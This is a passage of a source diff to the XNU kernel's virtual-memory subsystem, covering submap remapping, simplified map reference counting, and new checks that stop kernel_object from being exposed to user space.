required_max_prot) != + required_max_prot)) { if (vmk_flags.vmkf_copy_single_object && mapped_size != 0) { /* @@ -16514,18 +16477,16 @@ vm_map_remap_extract( break; } - if (src_entry->is_sub_map && - VM_MAP_PAGE_SHIFT(VME_SUBMAP(src_entry)) < PAGE_SHIFT) { + if (src_entry->is_sub_map) { vm_map_t submap; vm_map_offset_t submap_start; vm_map_size_t submap_size; vm_map_copy_t submap_copy; vm_prot_t submap_curprot, submap_maxprot; - - vm_remap_new_path++; + boolean_t submap_needs_copy; /* - * No check for "required_protection" on "src_entry" + * No check for "required protection" on "src_entry" * because the protections that matter are the ones * on the submap's VM map entry, which will be checked * during the call to vm_map_copy_extract() below. 
@@ -16537,16 +16498,47 @@ vm_map_remap_extract( submap = VME_SUBMAP(src_entry); submap_start = VME_OFFSET(src_entry) + src_start - src_entry->vme_start; submap_size = tmp_size; + if (copy) { + /* + * The caller wants a copy-on-write re-mapping, + * so let's extract from the submap accordingly. + */ + submap_needs_copy = TRUE; + } else if (src_entry->needs_copy) { + /* + * The caller wants a shared re-mapping but the + * submap is mapped with "needs_copy", so its + * contents can't be shared as is. Extract the + * contents of the submap as "copy-on-write". + * The re-mapping won't be shared with the + * original mapping but this is equivalent to + * what happened with the original "remap from + * submap" code. + * The shared region is mapped "needs_copy", for + * example. + */ + submap_needs_copy = TRUE; + } else { + /* + * The caller wants a shared re-mapping and + * this mapping can be shared (no "needs_copy"), + * so let's extract from the submap accordingly. + * Kernel submaps are mapped without + * "needs_copy", for example. 
+ */ + submap_needs_copy = FALSE; + } /* extra ref to keep submap alive */ vm_map_reference(submap); - DTRACE_VM6(remap_submap_recurse, + DTRACE_VM7(remap_submap_recurse, vm_map_t, map, vm_map_offset_t, addr, vm_map_size_t, size, boolean_t, copy, vm_map_offset_t, submap_start, - vm_map_size_t, submap_size); + vm_map_size_t, submap_size, + boolean_t, submap_needs_copy); /* * The map can be safely unlocked since we @@ -16560,11 +16552,21 @@ vm_map_remap_extract( vm_map_unlock(map); src_entry = NULL; /* not valid once map is unlocked */ + if (vm_remap_legacy) { + submap_curprot = VM_PROT_NONE; + submap_maxprot = VM_PROT_NONE; + if (max_prot_for_prot_copy) { + submap_maxprot = max_prot_for_prot_copy; + } + } else { + assert(!max_prot_for_prot_copy); + submap_curprot = *cur_protection; + submap_maxprot = *max_protection; + } result = vm_map_copy_extract(submap, submap_start, submap_size, - required_protection, - copy, + submap_needs_copy, &submap_copy, &submap_curprot, &submap_maxprot, @@ -16588,6 +16590,26 @@ vm_map_remap_extract( copy_entry = vm_map_copy_first_entry(submap_copy); assert(!copy_entry->is_sub_map); + object = VME_OBJECT(copy_entry); + + /* + * Prevent kernel_object from being exposed to + * user space. + */ + if (__improbable(object == kernel_object)) { + printf("%d[%s]: rejecting attempt to extract from kernel_object\n", + proc_selfpid(), + (current_task()->bsd_info + ? 
proc_name_address(current_task()->bsd_info) + : "?")); + DTRACE_VM(extract_kernel_only); + result = KERN_INVALID_RIGHT; + vm_map_copy_discard(submap_copy); + submap_copy = VM_MAP_COPY_NULL; + vm_map_lock(map); + break; + } + vm_map_copy_entry_unlink(submap_copy, copy_entry); copy_entry_size = copy_entry->vme_end - copy_entry->vme_start; copy_entry->vme_start = map_address; @@ -16603,24 +16625,32 @@ vm_map_remap_extract( /* done with submap_copy */ vm_map_copy_discard(submap_copy); - *cur_protection &= submap_curprot; - *max_protection &= submap_maxprot; + if (vm_remap_legacy) { + *cur_protection &= submap_curprot; + *max_protection &= submap_maxprot; + } /* re-acquire the map lock and continue to next entry */ vm_map_lock(map); continue; - } else if (src_entry->is_sub_map) { - vm_remap_old_path++; - DTRACE_VM4(remap_submap, - vm_map_t, map, - vm_map_offset_t, addr, - vm_map_size_t, size, - boolean_t, copy); - - vm_map_reference(VME_SUBMAP(src_entry)); - object = VM_OBJECT_NULL; } else { object = VME_OBJECT(src_entry); + + /* + * Prevent kernel_object from being exposed to + * user space. + */ + if (__improbable(object == kernel_object)) { + printf("%d[%s]: rejecting attempt to extract from kernel_object\n", + proc_selfpid(), + (current_task()->bsd_info + ? proc_name_address(current_task()->bsd_info) + : "?")); + DTRACE_VM(extract_kernel_only); + result = KERN_INVALID_RIGHT; + break; + } + if (src_entry->iokit_acct) { /* * This entry uses "IOKit accounting". 
@@ -16663,6 +16693,7 @@ vm_map_remap_extract( VME_OFFSET_SET(src_entry, 0); VME_OBJECT_SET(src_entry, object); assert(src_entry->use_pmap); + assert(!map->mapped_in_other_pmaps); } else if (src_entry->wired_count || object->copy_strategy != MEMORY_OBJECT_COPY_SYMMETRIC) { /* @@ -16756,6 +16787,7 @@ vm_map_remap_extract( */ object->copy_strategy = MEMORY_OBJECT_COPY_DELAY; + object->true_share = TRUE; } vm_object_unlock(object); } @@ -16801,6 +16833,10 @@ vm_map_remap_extract( new_entry->max_protection |= VM_PROT_WRITE; } else { new_entry->inheritance = inheritance; + if (!vm_remap_legacy) { + new_entry->protection = *cur_protection; + new_entry->max_protection = *max_protection; + } } VME_OFFSET_SET(new_entry, offset); @@ -16978,8 +17014,8 @@ RestartCopy: _vm_map_store_entry_link(map_header, map_header->links.prev, new_entry); - /*Protections for submap mapping are irrelevant here*/ - if (!src_entry->is_sub_map) { + /* protections for submap mapping are irrelevant here */ + if (vm_remap_legacy && !src_entry->is_sub_map) { *cur_protection &= src_entry->protection; *max_protection &= src_entry->max_protection; } @@ -17045,6 +17081,15 @@ vm_map_mark_alien( map->is_alien = true; vm_map_unlock(map); } + +void +vm_map_single_jit( + vm_map_t map) +{ + vm_map_lock(map); + map->single_jit = true; + vm_map_unlock(map); +} #endif /* XNU_TARGET_OS_OSX */ void vm_map_copy_to_physcopy(vm_map_copy_t copy_map, vm_map_t target_map); @@ -17622,8 +17667,9 @@ vm_map_range_physical_size( vmk_flags.vmkf_copy_pageable = TRUE; vmk_flags.vmkf_copy_same_map = TRUE; assert(adjusted_size != 0); + cur_prot = VM_PROT_NONE; /* legacy mode */ + max_prot = VM_PROT_NONE; /* legacy mode */ kr = vm_map_copy_extract(map, adjusted_start, adjusted_size, - VM_PROT_NONE, /* required_protection: no check here */ FALSE /* copy */, &copy_map, &cur_prot, &max_prot, VM_INHERIT_DEFAULT, @@ -17679,7 +17725,7 @@ memory_entry_check_for_adjustment( vm_named_entry_t named_entry; - named_entry = (vm_named_entry_t) 
port->ip_kobject; + named_entry = (vm_named_entry_t) ipc_kobject_get(port); named_entry_lock(named_entry); copy_map = named_entry->backing.copy; target_copy_map = copy_map; @@ -17730,8 +17776,8 @@ vm_map_remap( vm_map_t src_map, vm_map_offset_t memory_address, boolean_t copy, - vm_prot_t *cur_protection, - vm_prot_t *max_protection, + vm_prot_t *cur_protection, /* IN/OUT */ + vm_prot_t *max_protection, /* IN/OUT */ vm_inherit_t inheritance) { kern_return_t result; @@ -17841,10 +17887,9 @@ vm_map_remap( result = vm_map_copy_extract(src_map, memory_address, size, - VM_PROT_NONE, /* required_protection: no check here */ copy, &copy_map, - cur_protection, - max_protection, + cur_protection, /* IN/OUT */ + max_protection, /* IN/OUT */ inheritance, vmk_flags); if (result != KERN_SUCCESS) { @@ -19641,7 +19686,7 @@ convert_port_entry_to_map( mach_destroy_memory_entry(port); return VM_MAP_NULL; } - vm_map_reference_swap(map); + vm_map_reference(map); mach_destroy_memory_entry(port); break; } else { @@ -19726,27 +19771,16 @@ current_map(void) /* * vm_map_reference: * - * Most code internal to the osfmk will go through a - * macro defining this. This is always here for the - * use of other kernel components. + * Takes a reference on the specified map. 
*/ -#undef vm_map_reference void vm_map_reference( vm_map_t map) { - if (map == VM_MAP_NULL) { - return; + if (__probable(map != VM_MAP_NULL)) { + vm_map_require(map); + os_ref_retain(&map->map_refcnt); } - - lck_mtx_lock(&map->s_lock); -#if TASK_SWAPPER - assert(map->res_count > 0); - assert(os_ref_get_count(&map->map_refcnt) >= map->res_count); - map->res_count++; -#endif - os_ref_retain_locked(&map->map_refcnt); - lck_mtx_unlock(&map->s_lock); } /* @@ -19760,32 +19794,12 @@ void vm_map_deallocate( vm_map_t map) { - unsigned int ref; - - if (map == VM_MAP_NULL) { - return; - } - - lck_mtx_lock(&map->s_lock); - ref = os_ref_release_locked(&map->map_refcnt); - if (ref > 0) { - vm_map_res_deallocate(map); - lck_mtx_unlock(&map->s_lock); - return; + if (__probable(map != VM_MAP_NULL)) { + vm_map_require(map); + if (os_ref_release(&map->map_refcnt) == 0) { + vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS); + } } - assert(os_ref_get_count(&map->map_refcnt) == 0); - lck_mtx_unlock(&map->s_lock); - -#if TASK_SWAPPER - /* - * The map residence count isn't decremented here because - * the vm_map_delete below will traverse the entire map, - * deleting entries, and the residence counts on objects - * and sharing maps will go away then. 
- */ -#endif - - vm_map_destroy(map, VM_MAP_REMOVE_NO_FLAGS); } void diff --git a/osfmk/vm/vm_map.h b/osfmk/vm/vm_map.h index cd1364f2b..dca074ab6 100644 --- a/osfmk/vm/vm_map.h +++ b/osfmk/vm/vm_map.h @@ -109,7 +109,6 @@ __END_DECLS #ifdef MACH_KERNEL_PRIVATE -#include #include #include @@ -467,9 +466,9 @@ struct _vm_map { vm_map_size_t size; /* virtual size */ vm_map_size_t user_wire_limit;/* rlimit on user locked memory */ vm_map_size_t user_wire_size; /* current size of user locked memory in this map */ -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX vm_map_offset_t vmmap_high_start; -#endif +#endif /* XNU_TARGET_OS_OSX */ union { /* @@ -504,31 +503,27 @@ struct _vm_map { #define first_free f_s._first_free #define holes_list f_s._holes - struct os_refcnt map_refcnt; /* Reference count */ - -#if TASK_SWAPPER - int res_count; /* Residence count (swap) */ - int sw_state; /* Swap state */ -#endif /* TASK_SWAPPER */ + struct os_refcnt map_refcnt; /* Reference count */ unsigned int /* boolean_t */ wait_for_space:1, /* Should callers wait for space? */ - /* boolean_t */ wiring_required:1, /* All memory wired? */ - /* boolean_t */ no_zero_fill:1, /*No zero fill absent pages */ - /* boolean_t */ mapped_in_other_pmaps:1, /*has this submap been mapped in maps that use a different pmap */ - /* boolean_t */ switch_protect:1, /* Protect map from write faults while switched */ - /* boolean_t */ disable_vmentry_reuse:1, /* All vm entries should keep using newer and higher addresses in the map */ - /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */ + /* boolean_t */ wiring_required:1, /* All memory wired? 
*/ + /* boolean_t */ no_zero_fill:1, /* No zero fill absent pages */ + /* boolean_t */ mapped_in_other_pmaps:1, /* has this submap been mapped in maps that use a different pmap */ + /* boolean_t */ switch_protect:1, /* Protect map from write faults while switched */ + /* boolean_t */ disable_vmentry_reuse:1, /* All vm entries should keep using newer and higher addresses in the map */ + /* boolean_t */ map_disallow_data_exec:1, /* Disallow execution from data pages on exec-permissive architectures */ /* boolean_t */ holelistenabled:1, /* boolean_t */ is_nested_map:1, - /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */ + /* boolean_t */ map_disallow_new_exec:1, /* Disallow new executable code */ /* boolean_t */ jit_entry_exists:1, /* boolean_t */ has_corpse_footprint:1, /* boolean_t */ terminated:1, - /* boolean_t */ is_alien:1, /* for platform simulation, i.e. PLATFORM_IOS on OSX */ - /* boolean_t */ cs_enforcement:1, /* code-signing enforcement */ - /* boolean_t */ reserved_regions:1, /* has reserved regions. The map size that userspace sees should ignore these. */ - /* reserved */ pad:16; + /* boolean_t */ is_alien:1, /* for platform simulation, i.e. PLATFORM_IOS on OSX */ + /* boolean_t */ cs_enforcement:1, /* code-signing enforcement */ + /* boolean_t */ reserved_regions:1, /* has reserved regions. The map size that userspace sees should ignore these. */ + /* boolean_t */ single_jit:1, /* only allow one JIT mapping */ + /* reserved */ pad:15; unsigned int timestamp; /* Version number */ }; @@ -537,14 +532,6 @@ struct _vm_map { #define vm_map_first_entry(map) ((map)->hdr.links.next) #define vm_map_last_entry(map) ((map)->hdr.links.prev) -#if TASK_SWAPPER -/* - * VM map swap states. There are no transition states. 
- */ -#define MAP_SW_IN 1 /* map is swapped in; residence count > 0 */ -#define MAP_SW_OUT 2 /* map is out (res_count == 0 */ -#endif /* TASK_SWAPPER */ - /* * Type: vm_map_version_t [exported; contents invisible] * @@ -828,97 +815,9 @@ extern vm_map_entry_t vm_map_entry_insert( /* Physical map associated * with this address map */ -/* - * Macros/functions for map residence counts and swapin/out of vm maps - */ -#if TASK_SWAPPER - -#if MACH_ASSERT /* Gain a reference to an existing map */ extern void vm_map_reference( vm_map_t map); -/* Lose a residence count */ -extern void vm_map_res_deallocate( - vm_map_t map); -/* Gain a residence count on a map */ -extern void vm_map_res_reference( - vm_map_t map); -/* Gain reference & residence counts to possibly swapped-out map */ -extern void vm_map_reference_swap( - vm_map_t map); - -#else /* MACH_ASSERT */ - -#define vm_map_reference(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (Map) { \ - lck_mtx_lock(&Map->s_lock); \ - Map->res_count++; \ - os_ref_retain(&Map->map_refcnt); \ - lck_mtx_unlock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_res_reference(map) \ -MACRO_BEGIN \ - vm_map_t Lmap = (map); \ - if (Lmap->res_count == 0) { \ - lck_mtx_unlock(&Lmap->s_lock);\ - vm_map_lock(Lmap); \ - vm_map_swapin(Lmap); \ - lck_mtx_lock(&Lmap->s_lock); \ - ++Lmap->res_count; \ - vm_map_unlock(Lmap); \ - } else \ - ++Lmap->res_count; \ -MACRO_END - -#define vm_map_res_deallocate(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (--Map->res_count == 0) { \ - lck_mtx_unlock(&Map->s_lock); \ - vm_map_lock(Map); \ - vm_map_swapout(Map); \ - vm_map_unlock(Map); \ - lck_mtx_lock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_reference_swap(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - lck_mtx_lock(&Map->s_lock); \ - os_ref_retain(&Map->map_refcnt);\ - vm_map_res_reference(Map); \ - lck_mtx_unlock(&Map->s_lock); \ -MACRO_END -#endif /* MACH_ASSERT */ - -extern void vm_map_swapin( - vm_map_t map); - -extern void 
vm_map_swapout( - vm_map_t map); - -#else /* TASK_SWAPPER */ - -#define vm_map_reference(map) \ -MACRO_BEGIN \ - vm_map_t Map = (map); \ - if (Map) { \ - lck_mtx_lock(&Map->s_lock); \ - os_ref_retain(&Map->map_refcnt);\ - lck_mtx_unlock(&Map->s_lock); \ - } \ -MACRO_END - -#define vm_map_reference_swap(map) vm_map_reference(map) -#define vm_map_res_reference(map) -#define vm_map_res_deallocate(map) - -#endif /* TASK_SWAPPER */ /* * Submap object. Must be used to create memory to be put @@ -939,28 +838,6 @@ extern vm_object_t vm_submap_object; thread_wakeup((event_t)(&(map)->hdr)) -#define vm_map_ref_fast(map) \ - MACRO_BEGIN \ - lck_mtx_lock(&map->s_lock); \ - map->ref_count++; \ - vm_map_res_reference(map); \ - lck_mtx_unlock(&map->s_lock); \ - MACRO_END - -#define vm_map_dealloc_fast(map) \ - MACRO_BEGIN \ - int c; \ - \ - lck_mtx_lock(&map->s_lock); \ - c = --map->ref_count; \ - if (c > 0) \ - vm_map_res_deallocate(map); \ - lck_mtx_unlock(&map->s_lock); \ - if (c == 0) \ - vm_map_destroy(map); \ - MACRO_END - - /* simplify map entries */ extern void vm_map_simplify_entry( vm_map_t map, @@ -1384,6 +1261,9 @@ extern kern_return_t vm_map_enter_mem_object_control( extern kern_return_t vm_map_terminate( vm_map_t map); +extern void vm_map_require( + vm_map_t map); + #endif /* !XNU_KERNEL_PRIVATE */ /* Deallocate a region */ @@ -1475,7 +1355,6 @@ extern kern_return_t vm_map_copy_extract( vm_map_t src_map, vm_map_address_t src_addr, vm_map_size_t len, - vm_prot_t required_prot, boolean_t copy, vm_map_copy_t *copy_result, /* OUT */ vm_prot_t *cur_prot, /* OUT */ @@ -1529,11 +1408,11 @@ extern kern_return_t vm_map_raise_max_offset( extern kern_return_t vm_map_raise_min_offset( vm_map_t map, vm_map_offset_t new_min_offset); -#if !CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX extern void vm_map_set_high_start( vm_map_t map, vm_map_offset_t high_start); -#endif +#endif /* XNU_TARGET_OS_OSX */ extern vm_map_offset_t vm_compute_max_offset( boolean_t is64); @@ -1607,6 +1486,7 @@ 
mach_vm_range_overflows(mach_vm_offset_t addr, mach_vm_size_t size) #if XNU_TARGET_OS_OSX extern void vm_map_mark_alien(vm_map_t map); +extern void vm_map_single_jit(vm_map_t map); #endif /* XNU_TARGET_OS_OSX */ extern kern_return_t vm_map_page_info( @@ -1716,7 +1596,7 @@ static inline bool VM_MAP_POLICY_ALLOW_MULTIPLE_JIT( vm_map_t map __unused) { - if (VM_MAP_IS_ALIEN(map)) { + if (VM_MAP_IS_ALIEN(map) || map->single_jit) { return false; } return true; diff --git a/osfmk/vm/vm_object.c b/osfmk/vm/vm_object.c index b7a718aea..178a19552 100644 --- a/osfmk/vm/vm_object.c +++ b/osfmk/vm/vm_object.c @@ -64,7 +64,6 @@ #include #include -#include #include #include @@ -244,10 +243,18 @@ SECURITY_READ_ONLY_LATE(zone_t) vm_object_zone; /* vm backing store zone */ * memory object (kernel_object) to avoid wasting data structures. */ static struct vm_object kernel_object_store VM_PAGE_PACKED_ALIGNED; -vm_object_t kernel_object; +SECURITY_READ_ONLY_LATE(vm_object_t) kernel_object = &kernel_object_store; static struct vm_object compressor_object_store VM_PAGE_PACKED_ALIGNED; -vm_object_t compressor_object = &compressor_object_store; +SECURITY_READ_ONLY_LATE(vm_object_t) compressor_object = &compressor_object_store; + +/* + * This object holds all pages that have been retired due to errors like ECC. + * The system should never use the page or look at its contents. The offset + * in this object is the same as the page's physical address. + */ +static struct vm_object retired_pages_object_store VM_PAGE_PACKED_ALIGNED; +SECURITY_READ_ONLY_LATE(vm_object_t) retired_pages_object = &retired_pages_object_store; /* * The submap object is used as a placeholder for vm_map_submap @@ -256,6 +263,8 @@ vm_object_t compressor_object = &compressor_object_s * here because it must be initialized here. 
*/ static struct vm_object vm_submap_object_store VM_PAGE_PACKED_ALIGNED; +SECURITY_READ_ONLY_LATE(vm_object_t) vm_submap_object = &vm_submap_object_store; + /* * Virtual memory objects are initialized from @@ -279,9 +288,6 @@ static const struct vm_object vm_object_template = { .vo_size = 0, .memq_hint = VM_PAGE_NULL, .ref_count = 1, -#if TASK_SWAPPER - .res_count = 1, -#endif /* TASK_SWAPPER */ .resident_page_count = 0, .wired_page_count = 0, .reusable_page_count = 0, @@ -554,7 +560,7 @@ vm_object_bootstrap(void) ZC_NOENCRYPT | ZC_ALIGNMENT_REQUIRED, ZONE_ID_ANY, ^(zone_t z){ #if defined(__LP64__) - zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED_MAP); + zone_set_submap_idx(z, Z_SUBMAP_IDX_VA_RESTRICTED); #else (void)z; #endif @@ -568,30 +574,28 @@ vm_object_bootstrap(void) * Initialize the "kernel object" */ - kernel_object = &kernel_object_store; - -/* - * Note that in the following size specifications, we need to add 1 because - * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size. - */ - - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - kernel_object); - - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - compressor_object); + /* + * Note that in the following size specifications, we need to add 1 because + * VM_MAX_KERNEL_ADDRESS (vm_last_addr) is a maximum address, not a size. + */ + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, kernel_object); + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, compressor_object); kernel_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; compressor_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; kernel_object->no_tag_update = TRUE; + /* + * The object to hold retired VM pages. + */ + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, retired_pages_object); + retired_pages_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; + /* * Initialize the "submap object". Make it as large as the * kernel object so that no limit is imposed on submap sizes. 
*/ - vm_submap_object = &vm_submap_object_store; - _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, - vm_submap_object); + _vm_object_allocate(VM_MAX_KERNEL_ADDRESS + 1, vm_submap_object); vm_submap_object->copy_strategy = MEMORY_OBJECT_COPY_NONE; /* @@ -666,7 +670,7 @@ vm_object_deallocate( return; } - if (object == kernel_object || object == compressor_object) { + if (object == kernel_object || object == compressor_object || object == retired_pages_object) { vm_object_lock_shared(object); OSAddAtomic(-1, &object->ref_count); @@ -674,6 +678,8 @@ vm_object_deallocate( if (object->ref_count == 0) { if (object == kernel_object) { panic("vm_object_deallocate: losing kernel_object\n"); + } else if (object == retired_pages_object) { + panic("vm_object_deallocate: losing retired_pages_object\n"); } else { panic("vm_object_deallocate: losing compressor_object\n"); } @@ -805,7 +811,6 @@ vm_object_deallocate( if ((object->ref_count > 1) || object->terminating) { vm_object_lock_assert_exclusive(object); object->ref_count--; - vm_object_res_deallocate(object); if (object->ref_count == 1 && object->shadow != VM_OBJECT_NULL) { @@ -847,7 +852,6 @@ vm_object_deallocate( continue; } - VM_OBJ_RES_DECR(object); /* XXX ? */ /* * Terminate this object. 
If it had a shadow, * then deallocate it; otherwise, if we need @@ -928,7 +932,7 @@ vm_object_page_grab( if ((p->vmp_q_state != VM_PAGE_ON_ACTIVE_Q) && p->vmp_reference == TRUE) { vm_page_activate(p); - VM_STAT_INCR(reactivations); + counter_inc(&vm_statistics_reactivations); vm_object_page_grab_reactivations++; } vm_page_unlock_queues(); @@ -1297,7 +1301,6 @@ vm_object_terminate( vm_object_lock_assert_exclusive(object); object->ref_count--; assert(object->ref_count > 0); - vm_object_res_deallocate(object); vm_object_unlock(object); return KERN_FAILURE; } @@ -1443,14 +1446,10 @@ vm_object_reap( object->pager = MEMORY_OBJECT_NULL; if (pager != MEMORY_OBJECT_NULL) { - memory_object_control_disable(object->pager_control); + memory_object_control_disable(&object->pager_control); } object->ref_count--; -#if TASK_SWAPPER - assert(object->res_count == 0); -#endif /* TASK_SWAPPER */ - assert(object->ref_count == 0); /* @@ -1646,7 +1645,7 @@ restart_after_sleep: pmap_flush_context_init(&pmap_flush_context_storage); } - vm_page_lockspin_queues(); + vm_page_lock_queues(); next = (vm_page_t)vm_page_queue_first(&object->memq); @@ -1675,7 +1674,7 @@ restart_after_sleep: loop_count = BATCH_LIMIT(V_O_R_MAX_BATCH); - vm_page_lockspin_queues(); + vm_page_lock_queues(); } if (reap_type == REAP_DATA_FLUSH || reap_type == REAP_TERMINATE) { if (p->vmp_busy || p->vmp_cleaning) { @@ -1974,7 +1973,7 @@ vm_object_destroy( old_pager = object->pager; object->pager = MEMORY_OBJECT_NULL; if (old_pager != MEMORY_OBJECT_NULL) { - memory_object_control_disable(object->pager_control); + memory_object_control_disable(&object->pager_control); } /* @@ -3736,13 +3735,6 @@ Retry: assert(new_copy->ref_count > 0); new_copy->ref_count++; /* for old_copy->shadow ref. 
*/ -#if TASK_SWAPPER - if (old_copy->res_count) { - VM_OBJ_RES_INCR(new_copy); - VM_OBJ_RES_DECR(src_object); - } -#endif - vm_object_unlock(old_copy); /* done with old_copy */ } @@ -3926,6 +3918,14 @@ vm_object_shadow( assert(source->copy_strategy != MEMORY_OBJECT_COPY_NONE); /* Purgeable objects shouldn't have shadow objects. */ +#if 00 + /* + * The following optimization does not work in the context of submaps + * (the shared region, in particular). + * This object might have only 1 reference (in the submap) but that + * submap can itself be mapped multiple times, so the object is + * actually indirectly referenced more than once... + */ if (vm_object_shadow_check && source->vo_size == length && source->ref_count == 1) { @@ -3951,6 +3951,7 @@ vm_object_shadow( /* things changed while we were locking "source"... */ vm_object_unlock(source); } +#endif /* 00 */ /* * *offset is the map entry's offset into the VM object and @@ -4489,7 +4490,7 @@ vm_object_do_collapse( object->paging_offset = backing_object->paging_offset + backing_offset; if (object->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object->pager_control, + memory_object_control_collapse(&object->pager_control, object); } /* the backing_object has lost its pager: reset all fields */ @@ -4581,26 +4582,7 @@ vm_object_do_bypass( vm_object_lock_assert_exclusive(object); vm_object_lock_assert_exclusive(backing_object); -#if TASK_SWAPPER - /* - * Do object reference in-line to - * conditionally increment shadow's - * residence count. If object is not - * resident, leave residence count - * on shadow alone. 
- */ - if (backing_object->shadow != VM_OBJECT_NULL) { - vm_object_lock(backing_object->shadow); - vm_object_lock_assert_exclusive(backing_object->shadow); - backing_object->shadow->ref_count++; - if (object->res_count != 0) { - vm_object_res_reference(backing_object->shadow); - } - vm_object_unlock(backing_object->shadow); - } -#else /* TASK_SWAPPER */ vm_object_reference(backing_object->shadow); -#endif /* TASK_SWAPPER */ assert(!object->phys_contiguous); assert(!backing_object->phys_contiguous); @@ -4654,12 +4636,6 @@ vm_object_do_bypass( (!backing_object->named && backing_object->ref_count > 1)) { vm_object_lock_assert_exclusive(backing_object); backing_object->ref_count--; -#if TASK_SWAPPER - if (object->res_count != 0) { - vm_object_res_deallocate(backing_object); - } - assert(backing_object->ref_count > 0); -#endif /* TASK_SWAPPER */ vm_object_unlock(backing_object); } else { /* @@ -4667,12 +4643,6 @@ vm_object_do_bypass( * the backing object. */ -#if TASK_SWAPPER - if (object->res_count == 0) { - /* XXX get a reference for the deallocate below */ - vm_object_res_reference(backing_object); - } -#endif /* TASK_SWAPPER */ /* * vm_object_collapse (the caller of this function) is * now called from contexts that may not guarantee that a @@ -5373,9 +5343,7 @@ vm_object_populate_with_private( VM_PAGE_SET_PHYS_PAGE(m, base_page); } } else { - while ((m = vm_page_grab_fictitious()) == VM_PAGE_NULL) { - vm_page_more_fictitious(); - } + m = vm_page_grab_fictitious(TRUE); /* * private normally requires lock_queues but since we @@ -5496,7 +5464,6 @@ restart: object->named = TRUE; vm_object_lock_assert_exclusive(object); object->ref_count++; - vm_object_res_reference(object); while (!object->pager_ready) { vm_object_sleep(object, VM_OBJECT_EVENT_PAGER_READY, @@ -5579,7 +5546,6 @@ vm_object_release_name( vm_object_deallocate(object); return KERN_SUCCESS; } - VM_OBJ_RES_DECR(object); shadow = object->pageout?VM_OBJECT_NULL:object->shadow; if (object->ref_count == 1) { @@ 
-6287,93 +6253,6 @@ out: } -#if TASK_SWAPPER -/* - * vm_object_res_deallocate - * - * (recursively) decrement residence counts on vm objects and their shadows. - * Called from vm_object_deallocate and when swapping out an object. - * - * The object is locked, and remains locked throughout the function, - * even as we iterate down the shadow chain. Locks on intermediate objects - * will be dropped, but not the original object. - * - * NOTE: this function used to use recursion, rather than iteration. - */ - -__private_extern__ void -vm_object_res_deallocate( - vm_object_t object) -{ - vm_object_t orig_object = object; - /* - * Object is locked so it can be called directly - * from vm_object_deallocate. Original object is never - * unlocked. - */ - assert(object->res_count > 0); - while (--object->res_count == 0) { - assert(object->ref_count >= object->res_count); - vm_object_deactivate_all_pages(object); - /* iterate on shadow, if present */ - if (object->shadow != VM_OBJECT_NULL) { - vm_object_t tmp_object = object->shadow; - vm_object_lock(tmp_object); - if (object != orig_object) { - vm_object_unlock(object); - } - object = tmp_object; - assert(object->res_count > 0); - } else { - break; - } - } - if (object != orig_object) { - vm_object_unlock(object); - } -} - -/* - * vm_object_res_reference - * - * Internal function to increment residence count on a vm object - * and its shadows. It is called only from vm_object_reference, and - * when swapping in a vm object, via vm_map_swap. - * - * The object is locked, and remains locked throughout the function, - * even as we iterate down the shadow chain. Locks on intermediate objects - * will be dropped, but not the original object. - * - * NOTE: this function used to use recursion, rather than iteration. - */ - -__private_extern__ void -vm_object_res_reference( - vm_object_t object) -{ - vm_object_t orig_object = object; - /* - * Object is locked, so this can be called directly - * from vm_object_reference. 
This lock is never released. - */ - while ((++object->res_count == 1) && - (object->shadow != VM_OBJECT_NULL)) { - vm_object_t tmp_object = object->shadow; - - assert(object->ref_count >= object->res_count); - vm_object_lock(tmp_object); - if (object != orig_object) { - vm_object_unlock(object); - } - object = tmp_object; - } - if (object != orig_object) { - vm_object_unlock(object); - } - assert(orig_object->ref_count >= orig_object->res_count); -} -#endif /* TASK_SWAPPER */ - /* * vm_object_reference: * @@ -6576,9 +6455,6 @@ MACRO_END /* "ref_count" refers to the object not its contents */ assert(object1->ref_count >= 1); assert(object2->ref_count >= 1); -#if TASK_SWAPPER - /* "res_count" refers to the object not its contents */ -#endif /* "resident_page_count" was updated above when transposing pages */ /* "wired_page_count" was updated above when transposing pages */ #if !VM_TAG_ACTIVE_UPDATE @@ -6597,11 +6473,11 @@ MACRO_END __TRANSPOSE_FIELD(pager_control); /* update the memory_objects' pointers back to the VM objects */ if (object1->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object1->pager_control, + memory_object_control_collapse(&object1->pager_control, object1); } if (object2->pager_control != MEMORY_OBJECT_CONTROL_NULL) { - memory_object_control_collapse(object2->pager_control, + memory_object_control_collapse(&object2->pager_control, object2); } __TRANSPOSE_FIELD(copy_strategy); @@ -6754,11 +6630,11 @@ extern int speculative_reads_disabled; * that could give us non-page-size aligned values if we start out with values that * are odd multiples of PAGE_SIZE. 
